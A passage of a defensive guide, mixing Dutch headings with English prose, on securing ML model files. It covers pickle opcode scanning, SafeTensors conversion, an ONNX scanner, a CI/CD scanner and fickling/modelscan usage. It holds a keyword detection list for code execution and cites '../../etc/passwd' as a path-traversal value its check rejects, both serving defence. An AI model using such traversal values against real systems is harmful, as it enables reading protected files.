                                "finding": f"Dangerous reference: {arg}",
                            })
 
                elif opcode.name == "REDUCE":
                    findings.append({
                        "severity": "medium",
                        "position": pos,
                        "opcode": "REDUCE",
                        "finding": "REDUCE opcode found — triggers function call during unpickling",
                    })
 
        except Exception as e:
            findings.append({
                "severity": "error",
                "finding": f"Failed to analyze pickle file: {e}",
            })
 
        return findings

SafeTensors: het veilige alternatief

SafeTensors-architectuur

Het formaat is eenvoudig:

Een 8-byte headergrootte (little-endian uint64)
Een JSON-header die tensornamen, vormen, dtypes en byte-offsets beschrijft
Ruwe tensordata in aaneengesloten byte-arrays

Er is geen code, geen objectreconstructie, geen aanroep van callables — alleen data.

from safetensors import safe_open
from safetensors.torch import save_file, load_file
import torch
from typing import Dict
from pathlib import Path
 
class SafeTensorsManager:
    """Manage model weights using the SafeTensors format."""
 
    @staticmethod
    def convert_pytorch_to_safetensors(
        pytorch_path: str,
        safetensors_path: str,
    ) -> Dict:
        """Convert a PyTorch model file to SafeTensors format."""
        # Load with weights_only=True for safety during conversion
        state_dict = torch.load(
            pytorch_path, map_location="cpu", weights_only=True
        )
 
        # Ensure all values are tensors
        tensor_dict = {}
        for key, value in state_dict.items():
            if isinstance(value, torch.Tensor):
                tensor_dict[key] = value
            else:
                print(f"Warning: Skipping non-tensor key '{key}' (type: {type(value)})")
 
        save_file(tensor_dict, safetensors_path)
 
        return {
            "input": pytorch_path,
            "output": safetensors_path,
            "tensors_saved": len(tensor_dict),
            "tensors_skipped": len(state_dict) - len(tensor_dict),
        }
 
    @staticmethod
    def verify_safetensors_integrity(file_path: str) -> Dict:
        """Verify a SafeTensors file's integrity and inspect its contents."""
        path = Path(file_path)
        result = {
            "file": file_path,
            "size_bytes": path.stat().st_size,
            "format_valid": False,
            "tensors": [],
        }
 
        try:
            with safe_open(file_path, framework="pt", device="cpu") as f:
                keys = f.keys()
                for key in keys:
                    tensor = f.get_tensor(key)
                    result["tensors"].append({
                        "name": key,
                        "shape": list(tensor.shape),
                        "dtype": str(tensor.dtype),
                    })
                result["format_valid"] = True
                result["tensor_count"] = len(keys)
        except Exception as e:
            result["error"] = str(e)
 
        return result

Beperkingen van SafeTensors

SafeTensors is geen volledig modelformaat — het slaat alleen tensoren op, niet de modelarchitectuur, optimizer-state of trainingsconfiguratie. Dit betekent:

De modelarchitectuur moet in code worden gedefinieerd en het SafeTensors-bestand levert alleen de gewichten
Custom objecten (learning-rate-schema's, custom layers) kunnen niet worden geserialiseerd
Sommige Hugging Face-modellen leveren nog steeds pickle-bestanden naast SafeTensors voor achterwaartse compatibiliteit

ONNX-beveiligingsoverwegingen

Custom operators

ONNX ondersteunt custom operators die gedeelde libraries kunnen laden en uitvoeren:

from typing import Dict, List
from pathlib import Path
 
class ONNXSecurityScanner:
    """Scan ONNX models for security issues."""
 
    def scan_model(self, model_path: str) -> List[Dict]:
        """Scan an ONNX model for security concerns."""
        import onnx
 
        findings = []
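        # Parse the graph only. With the default load_external_data=True, onnx reads
        # external files and clears the references the check below looks for.
        model = onnx.load(model_path, load_external_data=False)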
 
        # Check for custom operators (could load arbitrary shared libraries)
        for node in model.graph.node:
            if node.domain and node.domain not in ("", "ai.onnx", "ai.onnx.ml"):
                findings.append({
                    "severity": "high",
                    "finding": f"Custom operator domain: {node.domain}",
                    "operator": node.op_type,
                    "detail": "Custom operators may load arbitrary native code",
                })
 
        # Check for external data references
        for initializer in model.graph.initializer:
            if initializer.data_location == 1:  # External data
                external_path = ""
                for entry in initializer.external_data:
                    if entry.key == "location":
                        external_path = entry.value
                findings.append({
                    "severity": "medium",
                    "finding": f"External data reference: {external_path}",
                    "detail": "External data could point to a malicious file path",
                })
 
        # Check model metadata for suspicious content
        for prop in model.metadata_props:
            if any(kw in prop.value.lower() for kw in ["exec", "system", "eval", "import"]):
                findings.append({
                    "severity": "medium",
                    "finding": f"Suspicious metadata: {prop.key}",
                    "value_preview": prop.value[:100],
                })
 
        # Check file size vs parameter count (anomalously large files may contain embedded data)
        file_size = Path(model_path).stat().st_size
        # Count scalar elements, not tensors: multiply out each initializer's dims
        param_count = 0
        for initializer in model.graph.initializer:
            elements = 1
            for dim in initializer.dims:
                elements *= dim
            param_count += elements
        if param_count > 0:
            bytes_per_param = file_size / param_count
            if bytes_per_param > 1000:  # Loose heuristic; tune for your models
                findings.append({
                    "severity": "low",
                    "finding": f"Anomalous file size ratio: {bytes_per_param:.0f} bytes/parameter",
                    "detail": "Model file may contain embedded non-model data",
                })
 
        return findings
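
The scanner above reports external data references but does not judge them. A minimal sketch of one possible follow-up check is shown below: it accepts a reference only if it is relative and resolves to a location inside the model's own directory. The helper name `is_safe_external_location` is hypothetical and not part of the onnx package.

```python
import os


def is_safe_external_location(model_dir: str, location: str) -> bool:
    """Return True only if `location` resolves to a path strictly inside `model_dir`."""
    # Reject empty and absolute paths outright
    if not location or os.path.isabs(location):
        return False
    # Resolve symlinks and ".." segments before comparing
    base = os.path.realpath(model_dir)
    target = os.path.realpath(os.path.join(base, location))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:
        # Raised when the paths cannot be compared (e.g. different drives on Windows)
        return False
    return inside and target != base
```

A reference such as `weights.bin` passes, while `../../etc/passwd` or `/etc/passwd` is rejected. Findings for rejected paths could reasonably be raised from "medium" to "high".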

Model file scanning pipeline

Automated scanning in CI/CD

Integrate model file scanning into your ML pipeline's CI/CD:

import hashlib
import json
from pathlib import Path
from typing import Dict, List, Optional
from datetime import datetime, timezone
 
class ModelFileScanner:
    """Comprehensive model file security scanner for CI/CD pipelines."""
 
    SAFE_FORMATS = {".safetensors", ".onnx", ".tflite", ".pb"}
    UNSAFE_FORMATS = {".pkl", ".pickle", ".pt", ".pth", ".bin", ".joblib"}
 
    def __init__(self, policy: str = "strict"):
        """
        Args:
            policy: 'strict' blocks all unsafe formats,
                    'warn' logs warnings but allows loading
        """
        self.policy = policy
 
    def scan_directory(self, directory: str) -> Dict:
        """Scan a directory of model files for security issues."""
        path = Path(directory)
        results = {
            "scan_time": datetime.now(timezone.utc).isoformat(),
            "directory": directory,
            "policy": self.policy,
            "files_scanned": 0,
            "findings": [],
            "blocked": [],
            "safe_files": [],
        }
 
        for file_path in path.rglob("*"):
            if not file_path.is_file():
                continue
 
            results["files_scanned"] += 1
            suffix = file_path.suffix.lower()
 
            if suffix in self.UNSAFE_FORMATS:
                finding = {
                    "file": str(file_path),
                    "format": suffix,
                    "severity": "high",
                    "finding": f"Unsafe serialization format: {suffix}",
                }
 
                # Deep scan pickle-based files
                if suffix in (".pkl", ".pickle", ".pt", ".pth", ".bin"):
                    try:
                        pickle_findings = SafeModelLoader.scan_pickle_for_dangerous_ops(
                            str(file_path)
                        )
                        if pickle_findings:
                            finding["pickle_analysis"] = pickle_findings
                            finding["severity"] = "critical"
                    except Exception as e:
                        finding["scan_error"] = str(e)
 
                results["findings"].append(finding)
                if self.policy == "strict":
                    results["blocked"].append(str(file_path))
 
            elif suffix in self.SAFE_FORMATS:
                results["safe_files"].append(str(file_path))
 
        results["pass"] = len(results["blocked"]) == 0
        return results
 
    def generate_manifest(self, directory: str) -> Dict[str, str]:
        """Generate a hash manifest for all model files in a directory."""
        path = Path(directory)
        manifest = {}
 
        for file_path in sorted(path.rglob("*")):
            if file_path.is_file():
                sha256 = hashlib.sha256()
                with open(file_path, "rb") as f:
                    for chunk in iter(lambda: f.read(8192), b""):
                        sha256.update(chunk)
                relative = str(file_path.relative_to(path))
                manifest[relative] = sha256.hexdigest()
 
        return manifest
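
One gap worth noting in the deep scan above: checkpoints written by `torch.save` since PyTorch 1.6 are ZIP archives that contain the pickle stream as a `data.pkl` member, so passing the `.pt` file straight to a pickle scanner will usually fail to parse. The sketch below is a standard-library-only heuristic that handles both cases and lists the imports a pickle stream would perform, without executing it. The function names are illustrative, and the `STACK_GLOBAL` resolution (using the two most recent string constants) is an approximation that a deliberately obfuscated pickle could evade.

```python
import pickletools
import zipfile
from typing import List


def list_pickle_imports(data: bytes) -> List[str]:
    """Return 'module.name' for each import opcode in a pickle stream (never unpickles)."""
    imports = []
    strings = []  # string constants seen so far, used to resolve STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            # pickletools reports the argument as "module name"
            module, name = arg.split(" ", 1)
            imports.append(f"{module}.{name}")
        elif opcode.name == "STACK_GLOBAL":
            # Heuristic: module and name are normally the last two strings pushed
            if len(strings) >= 2:
                imports.append(f"{strings[-2]}.{strings[-1]}")
            else:
                imports.append("<unresolved STACK_GLOBAL>")
        elif isinstance(arg, str):
            strings.append(arg)
    return imports


def list_imports_in_file(path: str) -> List[str]:
    """Scan a raw pickle file, or every .pkl member of a ZIP-based checkpoint."""
    if zipfile.is_zipfile(path):
        found = []
        with zipfile.ZipFile(path) as archive:
            for member in archive.namelist():
                if member.endswith(".pkl"):
                    found.extend(list_pickle_imports(archive.read(member)))
        return found
    with open(path, "rb") as f:
        return list_pickle_imports(f.read())
```

Any result outside an allowlist of expected modules (for a PyTorch state dict, typically `torch` and `collections` entries) is a reason to block the file. For production use, the dedicated tools covered in the next section are more thorough.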

Scanning with existing tools

Several tools can scan model files for malicious content:

#!/bin/bash
# Model file security scanning pipeline
 
MODEL_DIR="$1"
if [ -z "$MODEL_DIR" ]; then
    echo "Usage: $0 <model_directory>"
    exit 1
fi
 
echo "=== Model File Security Scan ==="
echo "Directory: $MODEL_DIR"
echo ""
 
# Check for unsafe file formats
echo "[*] Checking file formats:"
find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" \) | while IFS= read -r f; do
    echo "  CRITICAL: Pickle file found: $f"
done

find "$MODEL_DIR" -type f \( -name "*.pt" -o -name "*.pth" -o -name "*.bin" \) | while IFS= read -r f; do
    echo "  WARNING: PyTorch file (may use pickle): $f"
done

find "$MODEL_DIR" -type f -name "*.safetensors" | while IFS= read -r f; do
    echo "  OK: SafeTensors file: $f"
done
 
# Use fickling to analyze pickle files if available
echo ""
echo "[*] Deep pickle analysis (requires fickling):"
if command -v fickling &>/dev/null; then
    find "$MODEL_DIR" -type f \( -name "*.pkl" -o -name "*.pickle" -o -name "*.pt" -o -name "*.pth" \) | while IFS= read -r f; do
        echo "  Analyzing: $f"
        fickling --check-safety "$f" 2>/dev/null || echo "    Could not analyze $f"
    done
else
    echo "  fickling not installed. Install with: pip install fickling"
fi
 
# Use modelscan if available
echo ""
echo "[*] ModelScan analysis (requires modelscan):"
if command -v modelscan &>/dev/null; then
    modelscan scan -p "$MODEL_DIR"
else
    echo "  modelscan not installed. Install with: pip install modelscan"
fi
 
echo ""
echo "=== Scan Complete ==="

The tools used above are real, publicly available projects:

fickling (Trail of Bits): Static analysis of pickle files without executing them. https://github.com/trailofbits/fickling
modelscan (Protect AI): Scans model files for unsafe operations across multiple formats. https://github.com/protectai/modelscan

Format comparison

Format	Code execution risk	Ecosystem support	Performance	Recommended
Pickle (.pkl)	Critical: arbitrary code execution	Universal in Python	Fast	Never for untrusted sources
PyTorch (.pt/.pth)	High: uses pickle internally	PyTorch ecosystem	Fast	Use weights_only=True
SafeTensors	None: data only	Hugging Face, growing	Fast	Yes, preferred format
ONNX (.onnx)	Low: custom ops can load code	Cross-framework	Good	Yes, with review of custom ops
TensorRT (.plan)	Low: engine format	NVIDIA inference	Fastest	Yes, for NVIDIA deployment
TFLite (.tflite)	Low: FlatBuffers format	Mobile/edge	Good	Yes, for edge deployment

Defense recommendations

Use SafeTensors as the default serialization format for all new models
Always pass weights_only=True when loading PyTorch models with torch.load()
Scan all model files in CI/CD pipelines before deployment with fickling or modelscan
Never load pickle files from untrusted sources; treat them as executables
Convert existing pickle models to SafeTensors format and retire the pickle versions
Verify model file hashes against a trusted manifest before loading
Restrict model download sources to approved registries with verified publishers
Monitor Hugging Face models for changes after upload (pin commit hashes, not branch refs)
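
The hash verification recommendation can be sketched as a counterpart to `generate_manifest` from the scanner above. This is a minimal illustration, assuming the manifest maps relative paths to SHA-256 hex digests and was obtained through a trusted channel; the function names are hypothetical.

```python
import hashlib
from pathlib import Path
from typing import Dict, List


def sha256_file(path: Path) -> str:
    """Hash a file in chunks so large model files are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def verify_manifest(directory: str, manifest: Dict[str, str]) -> List[str]:
    """Return a list of problems; an empty list means the directory matches the manifest."""
    root = Path(directory)
    problems = []
    # Every file named in the manifest must exist with the expected digest
    for relative, expected in manifest.items():
        file_path = root / relative
        if not file_path.is_file():
            problems.append(f"missing: {relative}")
        elif sha256_file(file_path) != expected.lower():
            problems.append(f"hash mismatch: {relative}")
    # Files that are present but not listed are also suspicious
    on_disk = {str(p.relative_to(root)) for p in root.rglob("*") if p.is_file()}
    for extra in sorted(on_disk - set(manifest)):
        problems.append(f"not in manifest: {extra}")
    return problems
```

A loader would call `verify_manifest` first and refuse to open any model file if the returned list is non-empty. Flagging unlisted files matters because an attacker who cannot modify a tracked file may still be able to drop an extra pickle next to it.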

References

Trail of Bits fickling — https://github.com/trailofbits/fickling — static analysis for pickle files
Protect AI modelscan — https://github.com/protectai/modelscan — multi-format model file scanner
Hugging Face SafeTensors — https://github.com/huggingface/safetensors
MITRE ATLAS — AML.T0010 (ML Supply Chain Compromise)
OWASP LLM Top 10 2025 — LLM04 (Data and Model Poisoning)
Python pickle documentation — https://docs.python.org/3/library/pickle.html — see the security warnings
PyTorch weights_only documentation — https://pytorch.org/docs/stable/generated/torch.load.html
